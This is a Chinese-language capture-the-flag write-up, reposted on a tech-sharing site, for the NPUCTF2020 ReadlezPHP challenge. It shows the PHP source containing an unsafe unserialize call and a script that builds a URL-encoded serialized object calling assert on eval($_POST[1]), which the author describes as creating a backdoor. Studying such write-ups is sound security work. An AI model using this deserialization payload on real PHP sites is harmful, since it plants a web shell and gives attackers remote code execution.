标签：__ 22% 3A% echo HelloPhp new NPUCTF2020 ReadlezPHP

 打开源代码发现了个./time.php?source

于是打开点进去

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

审计代码：

发现在__destruct()方法里面有 echo $b($a);

这个是php的特性，php可以通过这种方法动态调用方法。

思路很简单，只要把$b赋值为方法名字，吧$a赋值成调用的参数就行了。

我首先考虑的是system结果发现system好像被过滤了，于是自己搭了环境

<?php
highlight_file(__FILE__);
class HelloPhp
{
    public $a = 'eval($_POST[1])';
    public $b = "assert";
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
// system('dir');
    // $b = new HelloPhp;
$c = urlencode(serialize(new HelloPhp));
echo($c);
//O%3A8%3A%22HelloPhp%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A15%3A%22eval%28%24_POST%5B1%5D%29%22%3Bs%3A1%3A%22b%22%3Bs%3A6%3A%22assert%22%3B%7D
?>

上述代码可以为自己创建一个后门。

payload：

 发现成功了，于是可以用蚁剑连接，但是这个题目用蚁剑连接以后是空白一片，于是考虑可能是在phpinfo()里面

标签：__,22%,3A%,echo,HelloPhp,new,NPUCTF2020,ReadlezPHP
来源： https://www.cnblogs.com/FPointzero/p/16424257.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。